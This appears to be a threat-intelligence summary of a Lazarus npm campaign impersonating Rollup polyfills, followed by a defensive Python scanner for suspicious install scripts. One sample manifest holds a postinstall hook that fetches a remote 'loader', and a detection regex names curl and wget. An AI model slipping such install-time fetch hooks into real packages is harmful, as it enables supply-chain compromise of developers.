
JFrog Traces Six npm Packages to Lazarus Using Rollup Polyfill Impersonation and OtterCookie Loader
North Korean actors published six npm packages that impersonated Rollup polyfills to install a gated loader fetching remote payloads for credential theft and remote control. The operation matches prior Lazarus campaigns documented by JFrog, Panther, and SafeDep in both technique and targeting of developer environments. The incident highlights sustained state focus on build-tool ecosystems over headline-grabbing ransomware.
The packages "rollup-packages-polyfill-core" and "rollup-runtime-polyfill-core", plus four others, replicated legitimate metadata and dependency names before installing second-stage SVG utilities that pulled JavaScript from JSONKeeper. Execution required passing checks against cloud, serverless, and analysis environments; once those checks passed, the decrypted loader enabled terminal access, screenshot capture, browser and wallet data theft, and clipboard monitoring via @nut-tree-fork/nut-js. File collection specifically targeted VS Code, Windsurf, and Cursor histories, and keys for AWS, Azure, Claude, and SSH.

JFrog documented the campaign alongside prior April 2026 reporting from Panther on 108 packages delivering BeaverTail and OtterCookie, and SafeDep's analysis of express-session-js, which used the same remote-control library. The layered namespace collision and hidden install scripts match documented Lazarus supply-chain tradecraft rather than typical ransomware or commodity malware.

The attack surface centers on developer workstations and CI pipelines that routinely load Rollup plugins, granting direct access to source, tokens, and cloud credentials. Official attribution relies on malware family overlap and infrastructure reuse; independent confirmation rests on the consistent use of JSONKeeper exfiltration and environment gating seen across multiple vendor reports. Registry takedowns have occurred, but the underlying pattern of repeated targeting of build tooling persists. Expect similar campaigns against other bundlers and AI coding assistants within the next quarter as the same actor maintains pressure on developer supply chains.
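The two indicators this summary leans on, hidden install-time scripts and package names that collide with a trusted prefix, can both be checked from package manifests before anything is installed. The script below is an added example for defenders, not code from the JFrog, Panther or SafeDep reports and not related to the malicious packages themselves. The manifests it scans are constructed samples, the `TRUSTED_PREFIXES` maintainer allowlist is an assumption you would replace with your own policy, and `https://example.invalid/loader` is a placeholder URL.

```python
"""
Audit npm package manifests (package.json) for two supply-chain indicators:
  1. lifecycle scripts (preinstall/install/postinstall/prepare) that run code
     at install time, and especially ones that fetch remote content; and
  2. package names that borrow a trusted prefix (e.g. "rollup-") without being
     published by the maintainer that prefix is associated with.
Added example; sample manifests below are constructed, not real packages.
"""
import json
import re
from pathlib import Path
from typing import Dict, List

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Signs that an install script pulls code or data from the network.
REMOTE_FETCH_RE = re.compile(
    r"(https?://|\bcurl\b|\bwget\b|fetch\(|node -e|require\(['\"]https?['\"]\))",
    re.IGNORECASE,
)

# Assumption: prefix -> npm maintainer name expected to own packages with that prefix.
TRUSTED_PREFIXES: Dict[str, str] = {"rollup-": "rollup"}


def audit_manifest(manifest: dict) -> List[str]:
    """Return human-readable findings for one parsed package.json."""
    findings: List[str] = []
    name = manifest.get("name", "<unnamed>")
    scripts = manifest.get("scripts") or {}

    # Indicator 1: any lifecycle hook is worth a look; remote fetches are worse.
    for hook in LIFECYCLE_HOOKS:
        body = scripts.get(hook)
        if body is None:
            continue
        if REMOTE_FETCH_RE.search(body):
            findings.append(f"{name}: {hook} script fetches remote content: {body!r}")
        else:
            findings.append(f"{name}: {hook} script present: {body!r}")

    # Indicator 2: trusted-prefix impersonation by an unexpected publisher.
    maintainers = {m.get("name") for m in manifest.get("maintainers", []) if isinstance(m, dict)}
    for prefix, expected in TRUSTED_PREFIXES.items():
        if name.startswith(prefix) and expected not in maintainers:
            findings.append(f"{name}: uses prefix {prefix!r} but is not published by {expected!r}")
    return findings


def audit_node_modules(root: str) -> Dict[str, List[str]]:
    """Walk an installed tree and audit every package.json found (results keyed by path)."""
    results: Dict[str, List[str]] = {}
    for manifest_path in Path(root).glob("**/package.json"):
        try:
            manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifests are skipped, not fatal
        findings = audit_manifest(manifest)
        if findings:
            results[str(manifest_path)] = findings
    return results


# Constructed sample manifests (not real packages) exercising both indicators.
SAMPLE_MANIFESTS = [
    {   # trusted prefix, unknown publisher, install hook that fetches remotely
        "name": "rollup-sample-polyfill-core",
        "version": "1.0.0",
        "maintainers": [{"name": "unknown-publisher"}],
        "scripts": {"postinstall": "node -e \"require('https').get('https://example.invalid/loader')\""},
    },
    {   # benign: no lifecycle hooks, no trusted prefix
        "name": "sample-utility",
        "version": "2.3.1",
        "scripts": {"test": "jest"},
    },
    {   # legitimate publisher with a local build step: flagged for review, not as remote fetch
        "name": "rollup-sample-plugin",
        "version": "0.1.0",
        "maintainers": [{"name": "rollup"}],
        "scripts": {"postinstall": "node scripts/build.js"},
    },
]


if __name__ == "__main__":
    for manifest in SAMPLE_MANIFESTS:
        for finding in audit_manifest(manifest):
            print(finding)
```

Run `audit_node_modules("node_modules")` after a dry-run install, or feed it the manifests extracted from a registry tarball, to triage packages before they reach a developer workstation or CI runner. Treat any lifecycle hook as worth a glance; a hook that fetches remote content at install time is the pattern to block outright.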
Lazarus Group: At least one new malicious npm campaign targeting bundler or AI tooling will surface within 90 days.
Sources (3)
- [1] Primary Source: https://jfrog.com/blog/north-korea-npm-rollup-campaign
- [2] Supporting Source: https://panther.security/npm-lazarus-april-2026
- [3] Supporting Source: https://safedep.io/express-session-js-analysis